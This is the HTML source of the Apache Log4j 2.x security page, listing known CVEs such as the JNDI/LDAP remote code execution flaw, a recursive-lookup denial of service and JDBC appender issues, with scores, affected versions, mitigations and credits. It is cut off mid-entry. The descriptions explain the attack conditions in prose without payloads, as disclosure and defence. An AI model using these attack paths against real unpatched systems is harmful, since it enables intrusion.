Google Git
Sign in
apache / logging-log4j-site / c83555f00ebe8967fddd9bc20e8f01bbccf81ea2 / . / 2.x / security.html
blob: 3d05624fcf36fdaa6c9a7af3f9387f9943cd1f4f [file] [log] [blame]
<!DOCTYPE html>
<!--
| Generated by Apache Maven Doxia Site Renderer 1.11.1 from target/generated-sources/site/asciidoc/security.adoc at 2024-03-06
| Rendered using Apache Maven Fluido Skin 1.11.2
-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="generator" content="Apache Maven Doxia Site Renderer 1.11.1" />
<title>Log4j &#x2013; </title>
<link rel="stylesheet" href="./css/apache-maven-fluido-1.11.2.min.css" />
<link rel="stylesheet" href="./css/site.css" />
<link rel="stylesheet" href="./css/print.css" media="print" />
<script src="./js/apache-maven-fluido-1.11.2.min.js"></script>
</head>
<body class="topBarDisabled">
<div class="container-fluid">
<header>
<div id="banner">
<div class="pull-left"><a href="../.." id="bannerLeft"><img src="images/ls-logo.jpg" alt="" style="" /></a></div>
<div class="pull-right"><a href="./" id="bannerRight"><img src="images/logo.png" alt="" style="" /></a></div>
<div class="clear"><hr/></div>
</div>
<div id="breadcrumbs">
<ul class="breadcrumb">
<li id="publishDate">Last Published: 2024-03-06<span class="divider">|</span>
</li>
<li id="projectVersion">Version: 2.23.1</li>
<li class="pull-right"><span class="divider">|</span>
<a href="https://github.com/apache/logging-log4j2" class="externalLink" title="GitHub">GitHub</a></li>
<li class="pull-right"><span class="divider">|</span>
<a href="../../" title="Logging Services">Logging Services</a></li>
<li class="pull-right"><span class="divider">|</span>
<a href="https://www.apache.org/" class="externalLink" title="Apache">Apache</a></li>
<li class="pull-right"><a href="https://cwiki.apache.org/confluence/display/LOGGING/Log4j" class="externalLink" title="Logging Wiki">Logging Wiki</a></li>
</ul>
</div>
</header>
<div class="row-fluid">
<header id="leftColumn" class="span2">
<nav class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header"><img class="imageLink" src="img/glyphicons/home.png" alt="Apache Log4j™ 2" style="border: 0;" /> Apache Log4j™ 2</li>
<li><a href="index.html" title="About"><span class="none"></span>About</a></li>
<li><a href="download.html" title="Download"><span class="none"></span>Download</a></li>
<li><a href="support.html" title="Support"><span class="none"></span>Support</a></li>
<li><a href="maven-artifacts.html" title="Maven, Ivy, Gradle Artifacts"><span class="icon-chevron-right"></span>Maven, Ivy, Gradle Artifacts</a></li>
<li><a href="release-notes.html" title="Release Notes"><span class="none"></span>Release Notes</a></li>
<li><a href="faq.html" title="FAQ"><span class="none"></span>FAQ</a></li>
<li><a href="performance.html" title="Performance"><span class="icon-chevron-right"></span>Performance</a></li>
<li><a href="articles.html" title="Articles and Tutorials"><span class="none"></span>Articles and Tutorials</a></li>
<li class="active"><a><span class="icon-chevron-down"></span>Security</a>
<ul class="nav nav-list">
<li><a href="security.html#support" title="Getting support"><span class="none"></span>Getting support</a></li>
<li><a href="security.html#reporting" title="Reporting vulnerabilities"><span class="none"></span>Reporting vulnerabilities</a></li>
<li><a href="security.html#policy" title="Vulnerability handling policy"><span class="none"></span>Vulnerability handling policy</a></li>
<li><a href="security.html#vdr" title="Vulnerability Disclosure Report (VDR)"><span class="none"></span>Vulnerability Disclosure Report (VDR)</a></li>
<li><a href="security.html#vulnerabilities" title="Known Vulnerabilities"><span class="none"></span>Known Vulnerabilities</a></li>
</ul></li>
<li class="nav-header"><img class="imageLink" src="img/glyphicons/book.png" alt="Manual" style="border: 0;" /> Manual</li>
<li><a href="manual/index.html" title="Introduction"><span class="none"></span>Introduction</a></li>
<li><a href="manual/architecture.html" title="Architecture"><span class="none"></span>Architecture</a></li>
<li><a href="manual/api-separation.html" title="API Separation"><span class="none"></span>API Separation</a></li>
<li><a href="manual/migration.html" title="Log4j 1.x Migration"><span class="icon-chevron-right"></span>Log4j 1.x Migration</a></li>
<li><a href="manual/api.html" title="Java API"><span class="icon-chevron-right"></span>Java API</a></li>
<li><a href="../kotlin" title="Kotlin API"><span class="none"></span>Kotlin API</a></li>
<li><a href="../scala" title="Scala API"><span class="none"></span>Scala API</a></li>
<li><a href="manual/configuration.html" title="Configuration"><span class="icon-chevron-right"></span>Configuration</a></li>
<li><a href="manual/usage.html" title="Usage"><span class="icon-chevron-right"></span>Usage</a></li>
<li><a href="manual/webapp.html" title="Web Applications and JSPs"><span class="icon-chevron-right"></span>Web Applications and JSPs</a></li>
<li><a href="manual/lookups.html" title="Lookups"><span class="icon-chevron-right"></span>Lookups</a></li>
<li><a href="manual/appenders.html" title="Appenders"><span class="icon-chevron-right"></span>Appenders</a></li>
<li><a href="manual/layouts.html" title="Layouts"><span class="icon-chevron-right"></span>Layouts</a></li>
<li><a href="manual/filters.html" title="Filters"><span class="icon-chevron-right"></span>Filters</a></li>
<li><a href="manual/async.html" title="Async Loggers"><span class="icon-chevron-right"></span>Async Loggers</a></li>
<li><a href="manual/garbagefree.html" title="Garbage-free Logging"><span class="icon-chevron-right"></span>Garbage-free Logging</a></li>
<li><a href="manual/jmx.html" title="JMX"><span class="none"></span>JMX</a></li>
<li><a href="manual/logsep.html" title="Logging Separation"><span class="none"></span>Logging Separation</a></li>
<li><a href="manual/extending.html" title="Extending Log4j"><span class="icon-chevron-right"></span>Extending Log4j</a></li>
<li><a href="manual/plugins.html" title="Plugins"><span class="icon-chevron-right"></span>Plugins</a></li>
<li><a href="manual/customconfig.html" title="Programmatic Log4j Configuration"><span class="icon-chevron-right"></span>Programmatic Log4j Configuration</a></li>
<li><a href="manual/customloglevels.html" title="Custom Log Levels"><span class="icon-chevron-right"></span>Custom Log Levels</a></li>
<li class="nav-header"><img class="imageLink" src="img/glyphicons/pencil.png" alt="For Contributors" style="border: 0;" /> For Contributors</li>
<li><a href="guidelines.html" title="Guidelines"><span class="none"></span>Guidelines</a></li>
<li><a href="javastyle.html" title="Style Guide"><span class="none"></span>Style Guide</a></li>
<li class="nav-header"><img class="imageLink" src="img/glyphicons/cog.png" alt="Components" style="border: 0;" /> Components</li>
<li><a href="log4j-api.html" title="API"><span class="none"></span>API</a></li>
<li><a href="log4j-jcl.html" title="Commons Logging Bridge"><span class="none"></span>Commons Logging Bridge</a></li>
<li><a href="log4j-1.2-api.html" title="Log4j 1.2 API"><span class="none"></span>Log4j 1.2 API</a></li>
<li><a href="log4j-slf4j-impl.html" title="SLF4J Binding"><span class="none"></span>SLF4J Binding</a></li>
<li><a href="log4j-jul.html" title="JUL Adapter"><span class="none"></span>JUL Adapter</a></li>
<li><a href="log4j-jpl.html" title="JDK Platform Logger"><span class="none"></span>JDK Platform Logger</a></li>
<li><a href="log4j-to-slf4j.html" title="Log4j 2 to SLF4J Adapter"><span class="none"></span>Log4j 2 to SLF4J Adapter</a></li>
<li><a href="log4j-flume-ng.html" title="Apache Flume Appender"><span class="none"></span>Apache Flume Appender</a></li>
<li><a href="log4j-taglib.html" title="Log4j Tag Library"><span class="none"></span>Log4j Tag Library</a></li>
<li><a href="log4j-jmx-gui.html" title="Log4j JMX GUI"><span class="none"></span>Log4j JMX GUI</a></li>
<li><a href="log4j-web.html" title="Log4j Web Application Support"><span class="none"></span>Log4j Web Application Support</a></li>
<li><a href="log4j-jakarta-web.html" title="Log4j Jakarta Web Application Support"><span class="none"></span>Log4j Jakarta Web Application Support</a></li>
<li><a href="log4j-appserver.html" title="Log4j Application Server Integration"><span class="none"></span>Log4j Application Server Integration</a></li>
<li><a href="log4j-couchdb.html" title="Log4j CouchDB appender"><span class="none"></span>Log4j CouchDB appender</a></li>
<li><a href="log4j-mongodb3.html" title="Log4j MongoDB3 appender"><span class="none"></span>Log4j MongoDB3 appender</a></li>
<li><a href="log4j-mongodb4.html" title="Log4j MongoDB4 appender"><span class="none"></span>Log4j MongoDB4 appender</a></li>
<li><a href="log4j-cassandra.html" title="Log4j Cassandra appender"><span class="none"></span>Log4j Cassandra appender</a></li>
<li><a href="log4j-iostreams.html" title="Log4j IO Streams"><span class="none"></span>Log4j IO Streams</a></li>
<li><a href="log4j-docker.html" title="Log4j Docker Support"><span class="none"></span>Log4j Docker Support</a></li>
<li><a href="log4j-kubernetes.html" title="Log4j Kubernetes Support"><span class="none"></span>Log4j Kubernetes Support</a></li>
<li><a href="log4j-spring-boot.html" title="Log4j Spring Boot"><span class="none"></span>Log4j Spring Boot</a></li>
<li><a href="log4j-spring-cloud-config-client.html" title="Log4j Spring Cloud Config Client"><span class="none"></span>Log4j Spring Cloud Config Client</a></li>
<li class="nav-header"><img class="imageLink" src="img/glyphicons/tag.png" alt="Related Projects" style="border: 0;" /> Related Projects</li>
<li><a href="../../chainsaw/2.x/index.html" title="Chainsaw"><span class="none"></span>Chainsaw</a></li>
<li><a href="../../log4cxx/latest_stable/index.html" title="Log4Cxx"><span class="none"></span>Log4Cxx</a></li>
<li><a href="../../log4j-audit/latest/index.html" title="Log4j Audit"><span class="none"></span>Log4j Audit</a></li>
<li><a href="../kotlin" title="Log4j Kotlin"><span class="none"></span>Log4j Kotlin</a></li>
<li><a href="../scala" title="Log4j Scala"><span class="none"></span>Log4j Scala</a></li>
<li><a href="../transform" title="Log4j Transform"><span class="none"></span>Log4j Transform</a></li>
<li><a href="../../log4net/index.html" title="Log4Net"><span class="none"></span>Log4Net</a></li>
<li class="nav-header"><img class="imageLink" src="img/glyphicons/link.png" alt="Legacy Sites" style="border: 0;" /> Legacy Sites</li>
<li><a href="../log4j-2.12.4/" title="Log4j 2.12.4 - Java 7"><span class="none"></span>Log4j 2.12.4 - Java 7</a></li>
<li><a href="../log4j-2.3.2/" title="Log4j 2.3.2 - Java 6"><span class="none"></span>Log4j 2.3.2 - Java 6</a></li>
<li><a href="../1.2/" title="Log4j 1.2 - End of Life"><span class="none"></span>Log4j 1.2 - End of Life</a></li>
<li class="nav-header"><img class="imageLink" src="img/glyphicons/info.png" alt="Project Information" style="border: 0;" /> Project Information</li>
<li><a href="team.html" title="Project Team"><span class="none"></span>Project Team</a></li>
<li><a href="https://www.apache.org/licenses/LICENSE-2.0" class="externalLink" title="Project License"><span class="none"></span>Project License</a></li>
<li><a href="https://github.com/apache/logging-log4j2" class="externalLink" title="Source Repository"><span class="none"></span>Source Repository</a></li>
<li><a href="runtime-dependencies.html" title="Runtime Dependencies"><span class="none"></span>Runtime Dependencies</a></li>
<li><a href="javadoc.html" title="Javadoc"><span class="none"></span>Javadoc</a></li>
<li><a href="thanks.html" title="Thanks"><span class="none"></span>Thanks</a></li>
</ul>
</nav>
<div class="well sidebar-nav">
<div id="poweredBy">
<div class="clear"></div>
<div class="clear"></div>
<div class="clear"></div>
<a href="http://maven.apache.org/" title="Built by Maven" class="poweredBy"><img class="builtBy" alt="Built by Maven" src="./images/logos/maven-feather.png" /></a>
</div>
</div>
</header>
<main id="bodyColumn" class="span10" >
<h1>Security</h1>
<div id="preamble">
<div class="sectionbody">
<div class="paragraph">
<p>The Apache Log4j Security Team takes security seriously.
This allows our users to place their trust in Log4j for protecting their mission-critical data.
In this page we will help you find guidance on security-related issues and access to known vulnerabilities.</p>
</div>
<div class="admonitionblock warning">
<table>
<tr>
<td class="icon">
<div class="title">Warning</div>
</td>
<td class="content">
<div class="paragraph">
<p><a href="http://logging.apache.org/log4j/1.x">Log4j 1</a> has <a href="https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces">reached End of Life</a> in 2015, and is no longer supported.
Vulnerabilities reported after August 2015 against Log4j 1 are not checked and will not be fixed.
Users should <a href="manual/migration.html">upgrade to Log4j 2</a> to obtain security fixes.</p>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="support">Getting support</h2>
<div class="sectionbody">
<div class="paragraph">
<p>If you need help on building or configuring Log4j or other help on following the instructions to mitigate the known vulnerabilities listed here, please use our <a href="support.html#discussions">user support channels</a>.</p>
</div>
<div class="admonitionblock tip">
<table>
<tr>
<td class="icon">
<div class="title">Tip</div>
</td>
<td class="content">
<div class="paragraph">
<p>If you need to apply a source code patch, use the building instructions for the Log4j version that you are using.
These instructions can be found in <code>BUILDING.adoc</code> distributed with the sources.</p>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="reporting">Reporting vulnerabilities</h2>
<div class="sectionbody">
<div class="paragraph">
<p>If you have encountered an unlisted security vulnerability or other unexpected behaviour that has a security impact, or if the descriptions here are incomplete, please report them <strong>privately</strong> to <a href="mailto:security@logging.apache.org">the Log4j Security Team</a>.</p>
</div>
<div class="admonitionblock warning">
<table>
<tr>
<td class="icon">
<div class="title">Warning</div>
</td>
<td class="content">
<div class="paragraph">
<p>The threat model that Log4j uses considers configuration files as safe input controlled by the programmer; <strong>potential vulnerabilities that require the ability to modify a configuration are not considered vulnerabilities</strong> as the required access to do so implies the attacker can execute arbitrary code.</p>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="policy">Vulnerability handling policy</h2>
<div class="sectionbody">
<div class="paragraph">
<p>The Apache Log4j Security Team follows the <a href="https://www.apache.org/security/committers.html">ASF Project Security</a> guide for handling security vulnerabilities.</p>
</div>
<div class="paragraph">
<p>Reported security vulnerabilities are subject to voting (by means of <a href="https://logging.apache.org/guidelines.html"><em>lazy approval</em></a>, preferably) in the private <a href="mailto:security@logging.apache.org">security mailing list</a> before creating a CVE and populating its associated content.
This procedure involves only the creation of CVEs and blocks neither (vulnerability) fixes, nor releases.</p>
</div>
</div>
</div>
<div class="sect1">
<h2 id="vdr">Vulnerability Disclosure Report (VDR)</h2>
<div class="sectionbody">
<div class="paragraph">
<p>Starting with version <code>2.22.0</code>, Log4j distributes <a href="https://cyclonedx.org/capabilities/vdr">CycloneDX Software Bill of Materials (SBOM)</a> along with each deployed artifact.
Produced SBOMs contain BOM-links referring to a <a href="https://cyclonedx.org/capabilities/vdr">CycloneDX Vulnerability Disclosure Report (VDR)</a> that Apache Logging Services uses for all projects it maintains.
All this is streamlined by <code>logging-parent</code>, see <a href="https://logging.apache.org/logging-parent/latest/#cyclonedx-sbom">its website</a> for details.</p>
</div>
</div>
</div>
<div class="sect1">
<h2 id="vulnerabilities">Known vulnerabilities</h2>
<div class="sectionbody">
<div class="paragraph">
<p>The Log4j Security Team believes that accuracy, completeness and availability of security information is essential for our users.
We choose to pool all information on this one page, allowing easy searching for security vulnerabilities over a range of criteria.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<div class="title">Note</div>
</td>
<td class="content">
<div class="paragraph">
<p>We adhere to <a href="https://maven.apache.org/enforcer/enforcer-rules/versionRanges.html">the Maven version range syntax</a> while sharing versions of affected components.
We only extend this mathematical notation with set union operator (i.e., <code></code>) to denote union of multiple ranges.</p>
</div>
</td>
</tr>
</table>
</div>
<div class="sect2">
<h3 id="CVE-2021-44832"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44832">CVE-2021-44832</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">JDBC appender is vulnerable to remote code execution in certain configurations</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">6.6 MEDIUM (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta7, 2.3.2) ∪ [2.4, 2.12.4) ∪ [2.13.0, 2.17.1)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.2</code> (for Java 6), <code>2.12.4</code> (for Java 7), or <code>2.17.1</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-44832-description">Description</h4>
<div class="paragraph">
<p>An attacker with write access to the logging configuration can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.
This issue is fixed by limiting JNDI data source names to the <code>java</code> protocol.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44832-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to <code>2.3.2</code> (for Java 6), <code>2.12.4</code> (for Java 7), or <code>2.17.1</code> (for Java 8 and later).</p>
</div>
<div class="paragraph">
<p>In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than <code>java</code>.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44832-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44832">CVE-2021-44832</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2021-45105"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45105">CVE-2021-45105</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">Infinite recursion in lookup evaluation</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">5.9 MEDIUM (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-alpha1, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), and <code>2.17.0</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-45105-description">Description</h4>
<div class="paragraph">
<p>Log4j versions <code>2.0-alpha1</code> through <code>2.16.0</code> (excluding <code>2.3.1</code> and <code>2.12.3</code>), did not protect from uncontrolled recursion that can be implemented using self-referential lookups.
When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, <code>$${ctx:loginId}</code>), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a <code>StackOverflowError</code> that will terminate the process.
This is also known as a <em>DoS (Denial-of-Service)</em> attack.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45105-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to <code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), or <code>2.17.0</code> (for Java 8 and later).</p>
</div>
<div class="paragraph">
<p>Alternatively, this infinite recursion issue can be mitigated in configuration:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>In PatternLayout in the logging configuration, replace Context Lookups like <code>${ctx:loginId}</code> or <code>$${ctx:loginId}</code> with Thread Context Map patterns (<code>%X</code>, <code>%mdc</code>, or <code>%MDC</code>).</p>
</li>
<li>
<p>Otherwise, in the configuration, remove references to Context Lookups like <code>${ctx:loginId}</code> or <code>$${ctx:loginId}</code> where they originate
from sources external to the application such as HTTP headers or user input.
Note that this mitigation is insufficient in releases older than <code>2.12.2</code> (for Java 7), and <code>2.16.0</code> (for Java 8 and later) as the issues fixed in those releases will still be present.</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Note that only the <code>log4j-core</code> JAR file is impacted by this vulnerability.
Applications using only the <code>log4j-api</code> JAR file without the <code>log4j-core</code> JAR file are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45105-credits">Credits</h4>
<div class="paragraph">
<p>Independently discovered by Hideki Okamoto of Akamai Technologies, Guy Lederfein of Trend Micro Research working with Trend Micro&#8217;s Zero Day Initiative, and another anonymous vulnerability researcher.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45105-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45105">CVE-2021-45105</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3230">LOG4J2-3230</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2021-45046"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45046">CVE-2021-45046</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">Thread Context Lookup is vulnerable to remote code execution in certain configurations</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">9.0 CRITICAL (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta9, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), and <code>2.17.0</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-45046-description">Description</h4>
<div class="paragraph">
<p>It was found that the fix to address <a href="#CVE-2021-44228">CVE-2021-44228</a> in Log4j <code>2.15.0</code> was incomplete in certain non-default configurations.
When the logging configuration uses a non-default Pattern Layout with a Thread Context Lookup (for example, <code>$${ctx:loginId}</code>), attackers with control over Thread Context Map (MDC) can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.
Remote code execution has been demonstrated on macOS, Fedora, Arch Linux, and Alpine Linux.</p>
</div>
<div class="paragraph">
<p>Note that this vulnerability is not limited to just the JNDI lookup.
Any other Lookup could also be included in a Thread Context Map variable and possibly have private details exposed to anyone with access to the logs.</p>
</div>
<div class="paragraph">
<p>Note that only the <code>log4j-core</code> JAR file is impacted by this vulnerability.
Applications using only the <code>log4j-api</code> JAR file without the <code>log4j-core</code> JAR file are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45046-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to Log4j <code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), or <code>2.17.0</code> (for Java 8 and later).</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45046-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Kai Mindermann of iC Consult and separately by 4ra1n.</p>
</div>
<div class="paragraph">
<p>Additional vulnerability details discovered independently by Ash Fox of Google, Alvaro Muñoz and Tony Torralba from GitHub, Anthony Weems of Praetorian, and RyotaK (@ryotkak).</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45046-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45046">CVE-2021-45046</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3221">LOG4J2-3221</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2021-44228"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228">CVE-2021-44228</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">JNDI lookup can be exploited to execute arbitrary code loaded from an LDAP server</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta9, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), and <code>2.17.0</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-44228-description">Description</h4>
<div class="paragraph">
<p>In Log4j, the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers.</p>
</div>
<div class="paragraph">
<p>Note that only the <code>log4j-core</code> JAR file is impacted by this vulnerability.
Applications using only the <code>log4j-api</code> JAR file without the <code>log4j-core</code> JAR file are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44228-mitigation">Mitigation</h4>
<div class="sect4">
<h5 id="CVE-2021-44228-mitigation-log4j1">Log4j 1 mitigation</h5>
<div class="admonitionblock warning">
<table>
<tr>
<td class="icon">
<div class="title">Warning</div>
</td>
<td class="content">
<div class="paragraph">
<p><a href="http://logging.apache.org/log4j/1.x">Log4j 1</a> has <a href="https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces">reached End of Life</a> in 2015, and is no longer supported.
Vulnerabilities reported after August 2015 against Log4j 1 are not checked and will not be fixed.
Users should <a href="manual/migration.html">upgrade to Log4j 2</a> to obtain security fixes.</p>
</div>
</td>
</tr>
</table>
</div>
<div class="paragraph">
<p>Log4j 1 does not have Lookups, so the risk is lower.
Applications using Log4j 1 are only vulnerable to this attack when they use JNDI in their configuration.
A separate CVE (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-4104">CVE-2021-4104</a>) has been filed for this vulnerability.
To mitigate, audit your logging configuration to ensure it has no <code>JMSAppender</code> configured.
Log4j 1 configurations without <code>JMSAppender</code> are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect4">
<h5 id="CVE-2021-44228-mitigation-log4j2">Log4j 2 mitigation</h5>
<div class="paragraph">
<p>Upgrade to Log4j <code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), or <code>2.17.0</code> (for Java 8 and later).</p>
</div>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44228-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44228-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228">CVE-2021-44228</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3198">LOG4J2-3198</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3201">LOG4J2-3201</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2020-9488"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9488">CVE-2020-9488</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">Improper validation of certificate with host mismatch in SMTP appender</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">3.7 LOW (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
